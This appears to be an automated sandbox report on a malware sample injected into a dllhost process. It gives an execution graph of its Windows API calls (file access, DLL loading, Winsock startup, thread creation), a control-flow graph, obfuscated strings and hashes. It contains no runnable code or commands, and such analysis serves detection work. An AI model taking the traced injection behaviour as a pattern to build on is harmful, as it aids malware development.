                                                                                                      execution_graph 83145 3101610 83146 310162c 83145->83146 83147 3101654 83146->83147 83148 3101668 83146->83148 83150 3109250 NtClose 83147->83150 83155 3109250 83148->83155 83152 310165d 83150->83152 83151 3101671 83158 310b410 RtlAllocateHeap 83151->83158 83154 310167c 83156 310926a 83155->83156 83157 310927b NtClose 83156->83157 83157->83151 83158->83154 83159 3108f50 83160 310900a 83159->83160 83162 3108f82 83159->83162 83161 3109020 NtCreateFile 83160->83161 83168 30f268c 83169 30f26b5 83168->83169 83172 30f6170 83169->83172 83171 30f26c0 83173 30f61a3 83172->83173 83174 30f61c7 83173->83174 83179 3108db0 83173->83179 83174->83171 83176 30f61ea 83176->83174 83177 3109250 NtClose 83176->83177 83178 30f626c 83177->83178 83178->83171 83180 3108dcd 83179->83180 83183 3842ca0 LdrInitializeThunk 83180->83183 83181 3108df9 83181->83176 83183->83181 83184 30f6c40 83185 30f6c6a 83184->83185 83188 30f7da0 83185->83188 83187 30f6c94 83189 30f7dbd 83188->83189 83195 3108970 83189->83195 83191 30f7e0d 83192 30f7e14 83191->83192 83200 3108a50 83191->83200 83192->83187 83194 30f7e3d 83194->83187 83196 3108a0e 83195->83196 83198 310899e 83195->83198 83205 3842f30 LdrInitializeThunk 83196->83205 83197 3108a47 83197->83191 83198->83191 83201 3108b01 83200->83201 83203 3108a7f 83200->83203 83206 3842d10 LdrInitializeThunk 83201->83206 83202 3108b46 83202->83194 83203->83194 83205->83197 83206->83202 83207 30f6280 83208 30f62a5 83207->83208 83211 3108ba0 83208->83211 83212 3108bbd 83211->83212 83215 3842c60 LdrInitializeThunk 83212->83215 83213 30f6319 83215->83213 83216 30f21c0 83218 30f21f6 83216->83218 83219 3108880 83216->83219 83220 310889d 83219->83220 83223 3842c0a 83220->83223 83221 31088c9 83221->83218 83224 3842c11 83223->83224 83225 3842c1f LdrInitializeThunk 83223->83225 83224->83221 83225->83221 83232 31010c0 83234 31010c5 83232->83234 83233 31010cb 83234->83233 83246 31090c0 83234->83246 83236 31011c2 83237 31011e0 83236->83237 83238 31011f5 83236->83238 83239 3109250 NtClose 83237->83239 83240 3109250 NtClose 83238->83240 83241 31011e9 83239->83241 83243 31011fe 83240->83243 83242 3101235 83243->83242 83250 310b2f0 83243->83250 83247 3109167 83246->83247 83249 31090eb 83246->83249 83248 310917d NtReadFile 83247->83248 83248->83236 83249->83236 83253 31095d0 83250->83253 83252 3101229 83254 31095ed 83253->83254 83255 31095fe RtlFreeHeap 83254->83255 83255->83252 83256 3842ad0 LdrInitializeThunk 83257 30e9e90 83260 30ea18c 83257->83260 83258 30ea59f 83260->83258 83261 310af50 83260->83261 83262 310af76 83261->83262 83267 30e41b0 83262->83267 83264 310af82 83265 310afbb 83264->83265 83270 31054c0 83264->83270 83265->83258 83268 30e41bd 83267->83268 83274 30f3120 83267->83274 83268->83264 83271 3105522 83270->83271 83273 310552f 83271->83273 83285 30f1900 83271->83285 83273->83265 83275 30f313d 83274->83275 83277 30f3156 83275->83277 83278 3109ca0 83275->83278 83277->83268 83279 3109cba 83278->83279 83280 3109ce9 83279->83280 83281 3108880 LdrInitializeThunk 83279->83281 83280->83277 83282 3109d46 83281->83282 83283 310b2f0 RtlFreeHeap 83282->83283 83284 3109d5c 83283->83284 83284->83277 83286 30f1938 83285->83286 83303 30f7d00 83286->83303 83288 30f1940 83289 30f1c1d 83288->83289 83314 310b3d0 83288->83314 83289->83273 83291 30f1956 83292 310b3d0 RtlAllocateHeap 83291->83292 83293 30f1967 83292->83293 83294 310b3d0 RtlAllocateHeap 83293->83294 83296 30f1978 83294->83296 83302 30f1a18 83296->83302 83325 30f68d0 NtClose LdrInitializeThunk LdrInitializeThunk 83296->83325 83298 30f1bd2 83299 30f1bfe WSAStartup 83298->83299 83300 30f1c0c 83298->83300 83299->83300 83321 3107e00 83300->83321 83317 30f4400 83302->83317 83304 30f7d2c 83303->83304 83326 30f7bf0 83304->83326 83307 30f7d59 83310 30f7d64 83307->83310 83311 3109250 NtClose 83307->83311 83308 30f7d71 83309 30f7d8d 83308->83309 83312 3109250 NtClose 83308->83312 83309->83288 83310->83288 83311->83310 83313 30f7d83 83312->83313 83313->83288 83337 3109580 83314->83337 83316 310b3eb 83316->83291 83318 30f4424 83317->83318 83319 30f442b 83318->83319 83320 30f4460 LdrLoadDll 83318->83320 83319->83298 83320->83319 83322 3107e62 83321->83322 83324 3107e6f 83322->83324 83340 30f1c30 83322->83340 83324->83289 83325->83302 83327 30f7c0a 83326->83327 83331 30f7ce6 83326->83331 83332 3108920 83327->83332 83330 3109250 NtClose 83330->83331 83331->83307 83331->83308 83333 310893a 83332->83333 83336 38435c0 LdrInitializeThunk 83333->83336 83334 30f7cda 83334->83330 83336->83334 83338 310959d 83337->83338 83339 31095ae RtlAllocateHeap 83338->83339 83339->83316 83345 30f1c50 83340->83345 83354 30f7fd0 83340->83354 83342 30f21a3 83342->83324 83344 30f1e65 83363 310c4c0 83344->83363 83345->83342 83358 310c390 83345->83358 83348 30f1e7a 83350 30f1ec7 83348->83350 83369 30f0730 83348->83369 83350->83342 83351 30f0730 LdrInitializeThunk 83350->83351 83373 30f7f70 83350->83373 83351->83350 83352 30f2018 83352->83350 83353 30f7f70 LdrInitializeThunk 83352->83353 83353->83352 83355 30f7fdd 83354->83355 83356 30f7ffe SetErrorMode 83355->83356 83357 30f8005 83355->83357 83356->83357 83357->83345 83359 310c3a0 83358->83359 83360 310c3a6 83358->83360 83359->83344 83361 310b3d0 RtlAllocateHeap 83360->83361 83362 310c3cc 83361->83362 83362->83344 83364 310c430 83363->83364 83365 310b3d0 RtlAllocateHeap 83364->83365 83367 310c48d 83364->83367 83366 310c46a 83365->83366 83368 310b2f0 RtlFreeHeap 83366->83368 83367->83348 83368->83367 83370 30f074c 83369->83370 83377 31094e0 83370->83377 83374 30f7f83 83373->83374 83375 30f7fae 83374->83375 83382 3108780 83374->83382 83375->83350 83378 31094fa 83377->83378 83381 3842c70 LdrInitializeThunk 83378->83381 83379 30f0752 83379->83352 83381->83379 83383 31087fe 83382->83383 83384 31087ab 83382->83384 83387 3842dd0 LdrInitializeThunk 83383->83387 83384->83375 83385 3108823 83385->83375 83387->83385 83388 3105f30 83389 3105f8a 83388->83389 83391 3105f97 83389->83391 83392 3103940 83389->83392 83393 3103981 83392->83393 83394 30f4400 LdrLoadDll 83393->83394 83396 3103a8e 83393->83396 83397 31039c7 83394->83397 83395 3103a10 Sleep 83395->83397 83396->83391 83397->83395 83397->83396 83398 3108830 83399 310884a 83398->83399 83402 3842df0 LdrInitializeThunk 83399->83402 83400 3108872 83402->83400 83409 31083f0 83410 310846d 83409->83410 83412 310841b 83409->83412 83414 38439b0 LdrInitializeThunk 83410->83414 83411 3108492 83414->83411 83417 30f5ae8 83418 30f5aeb 83417->83418 83419 30f5a8a 83417->83419 83420 30f7f70 LdrInitializeThunk 83419->83420 83421 30f5a90 83419->83421 83420->83421 83423 30f5abc 83421->83423 83424 30f7ef0 83421->83424 83425 30f7f34 83424->83425 83430 30f7f55 83425->83430 83431 3108550 83425->83431 83427 30f7f45 83428 30f7f61 83427->83428 83429 3109250 NtClose 83427->83429 83428->83421 83429->83430 83430->83421 83432 31085cd 83431->83432 83434 310857b 83431->83434 83436 3844650 LdrInitializeThunk 83432->83436 83433 31085f2 83433->83427 83434->83427 83436->83433 83437 30f0ca0 83438 30f0caf 83437->83438 83439 30f4400 LdrLoadDll 83438->83439 83440 30f0cd7 83439->83440 83441 30f0d23 83440->83441 83442 30f0d10 PostThreadMessageW 83440->83442 83442->83441 83443 30f59e0 83444 3108a50 LdrInitializeThunk 83443->83444 83445 30f5a1e 83444->83445 83446 31056a0 83447 3105701 83446->83447 83449 310570e 83447->83449 83450 30f7240 83447->83450 83451 30f721b 83450->83451 83452 30f7254 83450->83452 83453 30f7232 83451->83453 83455 30fb0f0 8 API calls 83451->83455 83453->83449 83455->83453 83462 31019a0 83463 31019b9 83462->83463 83464 3101a04 83463->83464 83467 3101a41 83463->83467 83469 3101a46 83463->83469 83465 310b2f0 RtlFreeHeap 83464->83465 83466 3101a11 83465->83466 83468 310b2f0 RtlFreeHeap 83467->83468 83468->83469 83470 3101929 83471 310192f 83470->83471 83472 3109250 NtClose 83471->83472 83474 3101934 83471->83474 83473 3101959 83472->83473 83475 30e9e30 83477 30e9e3f 83475->83477 83476 30e9e80 83477->83476 83478 30e9e6d CreateThread 83477->83478

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 30e9e90-30ea18a 1 30ea18c-30ea195 0->1 2 30ea19b-30ea1a7 0->2 1->2 3 30ea1be-30ea1cf 2->3 4 30ea1a9-30ea1bc 2->4 5 30ea1e0-30ea1ea 3->5 4->1 6 30ea1ec-30ea1fe 5->6 7 30ea200-30ea218 5->7 6->5 8 30ea229-30ea235 7->8 10 30ea25f-30ea268 8->10 11 30ea237-30ea243 8->11 14 30ea26e-30ea286 10->14 15 30ea4f5-30ea4fc 10->15 12 30ea24a-30ea24c 11->12 13 30ea245-30ea249 11->13 18 30ea24e-30ea257 12->18 19 30ea25d 12->19 13->12 20 30ea288-30ea292 14->20 21 30ea2c5-30ea2d9 14->21 16 30ea59f-30ea5a6 15->16 17 30ea502-30ea506 15->17 23 30ea5a8-30ea5ba 16->23 24 30ea5d0-30ea5d9 16->24 25 30ea508-30ea51f 17->25 26 30ea521-30ea52b 17->26 18->19 19->8 28 30ea2a3-30ea2af 20->28 22 30ea2ea-30ea2f3 21->22 31 30ea309-30ea310 22->31 32 30ea2f5-30ea307 22->32 29 30ea5bc-30ea5c0 23->29 30 30ea5c1-30ea5c3 23->30 25->17 33 30ea53c-30ea548 26->33 34 30ea2c0 28->34 35 30ea2b1-30ea2be 28->35 29->30 38 30ea5ce 30->38 39 30ea5c5-30ea5cb 30->39 40 30ea337-30ea340 31->40 41 30ea312-30ea335 31->41 32->22 42 30ea56f-30ea57b 33->42 43 30ea54a-30ea553 33->43 34->15 35->28 38->16 39->38 46 30ea35c-30ea366 40->46 47 30ea342-30ea35a 40->47 41->31 44 30ea57d-30ea598 42->44 45 30ea59a call 310af50 42->45 48 30ea55a-30ea55c 43->48 49 30ea555-30ea559 43->49 44->42 45->16 51 30ea377-30ea383 46->51 47->40 52 30ea55e-30ea567 48->52 53 30ea56d 48->53 49->48 54 30ea396-30ea39d 51->54 55 30ea385-30ea394 51->55 52->53 53->33 58 30ea39f-30ea3c3 54->58 59 30ea3ea-30ea3f4 54->59 55->51 61 30ea3d4-30ea3e8 58->61 62 30ea3c5-30ea3ce 58->62 60 30ea405-30ea411 59->60 63 30ea428-30ea432 60->63 64 30ea413-30ea426 60->64 61->54 62->61 66 30ea443-30ea44f 63->66 64->60 67 30ea467-30ea471 66->67 68 30ea451-30ea45a 66->68 71 30ea482-30ea48e 67->71 69 30ea45c-30ea45f 68->69 70 30ea465 68->70 69->70 70->66 73 30ea4a5-30ea4af 71->73 74 30ea490-30ea4a3 71->74 75 30ea4c0-30ea4c7 73->75 74->71 77 30ea4c9-30ea4ee 75->77 78 30ea4f0 75->78 77->75 78->10
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ''$,z$.k$3X$7$>I$?D$@P$A7c$Ay$B$C,$K$P}$XJ$_$a$c$e$x$K$z
                                                                                                      • API String ID: 0-3112496487
                                                                                                      • Opcode ID: e78b7a095d2137109f45f6bb26652a0978400aa9265d6f7557945aad2ba4df5b
                                                                                                      • Instruction ID: 57a0615b799ebfdfb37e9100dc8f2f929068b5cbc22ddc342af8c3498d7c4f45
                                                                                                      • Opcode Fuzzy Hash: e78b7a095d2137109f45f6bb26652a0978400aa9265d6f7557945aad2ba4df5b
                                                                                                      • Instruction Fuzzy Hash: 2A129FB0E06228CFEB64CF44C89879DBBB1BB89308F1085C9C54D6B280CBB55AC8CF55

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 03109051
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 240c071b417d403e8baa017791cc3a05bacebea4a2f0d2eb5320599c9cbd5026
                                                                                                      • Instruction ID: 4c448e0437b6c4972ce307ef8edff98a9a90e0c6c1d0572a5ef5e89a46f4ee49
                                                                                                      • Opcode Fuzzy Hash: 240c071b417d403e8baa017791cc3a05bacebea4a2f0d2eb5320599c9cbd5026
                                                                                                      • Instruction Fuzzy Hash: 5531D3B5A01248AFDB14DF98D880EEFB7B9EF8C314F108219F919A7344D770A945CBA4

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 031091A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2738559852-0
                                                                                                      • Opcode ID: a05d4bf5ac561e4fc725bb11c5abd3c1abfc43d9366ce3cf539d46de1c15cbbe
                                                                                                      • Instruction ID: 2aa6e7ec8746742b1b29def95614fee8a6f37ad140e6ff52429d62c7f4534540
                                                                                                      • Opcode Fuzzy Hash: a05d4bf5ac561e4fc725bb11c5abd3c1abfc43d9366ce3cf539d46de1c15cbbe
                                                                                                      • Instruction Fuzzy Hash: 3D31EAB5A00208AFDB14DF98D880EEFB7B9EF8C714F108219F919A7344D770A911CBA4
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2965232330.00000000030E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_30e0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID:
                                                                                                      • API String ID: 3535843008-0
                                                                                                      • Opcode ID: ee61ea0735f4b21a21d090c6670f37a5815685fc071b5499c4d16de24d957ece
                                                                                                      • Instruction ID: e20f97909e45566a56517050b2239c418899573b0b0d413f0485b74ab0f6fc34
                                                                                                      • Opcode Fuzzy Hash: ee61ea0735f4b21a21d090c6670f37a5815685fc071b5499c4d16de24d957ece
                                                                                                      • Instruction Fuzzy Hash: 69E04F766412047BD210EB59DC00FEB775CDFC9614F004415FA08AB242C670790586E4
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: af368056f379a880c01cf6255b5c1fdb3ec3910d460092d7a3895549c205ae66
                                                                                                      • Instruction ID: d28419300eccf5aa9e9169a33cbf541fab6f63fc9adb3f55bb224a46c434481b
                                                                                                      • Opcode Fuzzy Hash: af368056f379a880c01cf6255b5c1fdb3ec3910d460092d7a3895549c205ae66
                                                                                                      • Instruction Fuzzy Hash: 2B900231705804169141B1984884546440597E0301B65C052F5428554C8B148A5A5762
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: ffc8412bb8aa49bbdd713ce15416574c6664193cf032fb268d75292d2863da3b
                                                                                                      • Instruction ID: 508f695cf3b0ca7398223253b838c04f300f753babd6432aa5f04aea554924c9
                                                                                                      • Opcode Fuzzy Hash: ffc8412bb8aa49bbdd713ce15416574c6664193cf032fb268d75292d2863da3b
                                                                                                      • Instruction Fuzzy Hash: F5900261701504464141B1984804406640597E13013A5C156B5558560C87188959966A
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 583d914027e81fe785af5d31e8c2d3dbb75f1345b59e4f7c73a2169db81fdb6a
                                                                                                      • Instruction ID: d5ea8e1858b2234f7ea53be0100e0a8ee22a309e8dd635020c03bf760d1e8741
                                                                                                      • Opcode Fuzzy Hash: 583d914027e81fe785af5d31e8c2d3dbb75f1345b59e4f7c73a2169db81fdb6a
                                                                                                      • Instruction Fuzzy Hash: F390023170550806D101B1984514706140587D0201F75C452B5428568D87958A5569A3
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: d37abcc5b6975ae7f8c9cb869afefd609de61a1467b40c737a398c234d6258ba
                                                                                                      • Instruction ID: 11149640a2df9dc6a3369e868bd32de3b7102e4b6c22cdf0a401301e3f6a0f99
                                                                                                      • Opcode Fuzzy Hash: d37abcc5b6975ae7f8c9cb869afefd609de61a1467b40c737a398c234d6258ba
                                                                                                      • Instruction Fuzzy Hash: 33900261302404074106B1984414616440A87E0201B65C062F6018590DC62589956526
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 1a655ed0f6499111e47514a3fe9f6d0c07bd3e2508467d5b7ec11e6754434388
                                                                                                      • Instruction ID: 2557ff15860b0efaefac221fe6b7b0b251dace19172ec448d551f905cf795988
                                                                                                      • Opcode Fuzzy Hash: 1a655ed0f6499111e47514a3fe9f6d0c07bd3e2508467d5b7ec11e6754434388
                                                                                                      • Instruction Fuzzy Hash: 16900225311404070106F5980704507044687D5351365C062F6019550CD72189655522
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 685f6a0e592f72b8f7d26e17d3e72f88ebe6565b252abd4b8cdc3b2420b6b760
                                                                                                      • Instruction ID: e78f659cd858a0c9310d6809b0ea6423e8242b372065839469496054ff67a95e
                                                                                                      • Opcode Fuzzy Hash: 685f6a0e592f72b8f7d26e17d3e72f88ebe6565b252abd4b8cdc3b2420b6b760
                                                                                                      • Instruction Fuzzy Hash: A790022134545506D151B19C44046164405A7E0201F65C062B5818594D865589596622
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 6a18f74f5efb9cc370f2b11de8315eeed48083f93e4b2ea340c08dea3bd643b9
                                                                                                      • Instruction ID: 2c4f0d73293e9ec20541da51014b0f8f3423b138a01511adfa33d80db25a90ae
                                                                                                      • Opcode Fuzzy Hash: 6a18f74f5efb9cc370f2b11de8315eeed48083f93e4b2ea340c08dea3bd643b9
                                                                                                      • Instruction Fuzzy Hash: 64900221701404464141B1A888449064405ABE1211765C162B599C550D865989695A66
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: e37c52ce884f55bb998eb8dafc17fa0c2eadbb7b4a9b9b983fb78d017446d817
                                                                                                      • Instruction ID: 9f557f3331978def5ddd0c89114783f595a2eda005e7ab1a8e4af1d40b8d9885
                                                                                                      • Opcode Fuzzy Hash: e37c52ce884f55bb998eb8dafc17fa0c2eadbb7b4a9b9b983fb78d017446d817
                                                                                                      • Instruction Fuzzy Hash: 2E900221311C0446D201B5A84C14B07040587D0303F65C156B5158554CCA1589655922
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 22e0d40dfabd316bf6dc768bea943a2da46ef7393f2a0f06b4066218aca36556
                                                                                                      • Instruction ID: 4a2b9e0bf6be399eee3a5487f5f6c3a9666503df1db0e300d3f11203215573e3
                                                                                                      • Opcode Fuzzy Hash: 22e0d40dfabd316bf6dc768bea943a2da46ef7393f2a0f06b4066218aca36556
                                                                                                      • Instruction Fuzzy Hash: 9690026134140846D101B1984414B060405C7E1301F65C056F6068554D8719CD566527
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: e3e581c05f87e0ef1484531d12096c10f9a33fc582507f882d21a5ca3ee0bdc7
                                                                                                      • Instruction ID: 9b6a8106178a65e75e774e58f2a9cacba6453c2ce43413e9c45a43d22afde5da
                                                                                                      • Opcode Fuzzy Hash: e3e581c05f87e0ef1484531d12096c10f9a33fc582507f882d21a5ca3ee0bdc7
                                                                                                      • Instruction Fuzzy Hash: 1D90026130180807D141B5984804607040587D0302F65C052B7068555E8B298D556536
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.00000000038FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_37d0000_dllhost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: b7d59f3c88ceaa880b11dc02f450b41ff0540ae74e07036d45c742fe3b45fabd
                                                                                                      • Instruction ID: cc3231c627df2e85c1318377587280478144a592ccbcebb20e5f0290b974ea7d
                                                                                                      • Opcode Fuzzy Hash: b7d59f3c88ceaa880b11dc02f450b41ff0540ae74e07036d45c742fe3b45fabd
                                                                                                      • Instruction Fuzzy Hash: 9D900221342445565546F1984404507440697E02417A5C053B6418950C8626995ADA22
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037D0000, based on PE: true
